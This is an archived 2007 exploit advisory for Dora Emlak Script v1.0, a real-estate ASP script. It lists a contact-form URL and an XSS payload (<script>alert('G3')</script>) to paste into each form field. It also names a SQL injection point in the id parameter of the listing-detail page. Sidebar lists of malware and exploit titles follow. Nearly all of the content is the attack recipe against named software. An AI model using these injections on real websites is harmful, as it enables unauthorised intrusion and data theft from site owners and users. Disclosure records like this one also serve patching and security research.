doraemlak-xsssql.txt

Posted on 23 July 2007

Dora Emlak Script v1.0 XSS & sql injection Vulnerability.

#Software: Dora Emlak Script v1.0
#download: http://www.aspindir.com/goster/5027
#demo: http://www.fatihkaratas.info/dora/
#Found By: GeFORC3 ( G3 )

#Exploit:

1-http://www.example.com/dora/default.asp?goster=iletisim

You write xss code in  page's text box

Adýnýz   <script>alert("G3");</script>
Soyadýnýz  <script>alert("G3");</script>
Mail Adresiniz   <script>alert("G3");</script>
Konu     <script>alert("G3");</script>
Mesajýnýz   <script>alert("G3");</script>

Press to "gönder"(send) button.

This xss works on Dora Emlak Script v1.0

+

http://www.example.com//dora/default.asp?goster=emlakdetay&id= [SQL]


WwW.GeFORC3.Org  |  WwW.HeykirBlog.Com  |  WwW.NetKaBus.Com

TOP

Malware :

RATDispenser
whispergate
Borat RAT
Trojanized X_Trader
BlackLotus

Last 20

Exploits :

SOPlanning 1.52.00 Cross Site Scripting
SOPlanning 1.52.00 Cross Site Request Forgery
SOPlanning 1.52.00 SQL Injection
htmlLawed 1.2.5 Remote Command Execution
Online Tours And Travels Management System 1.0 SQL Injection

Last 20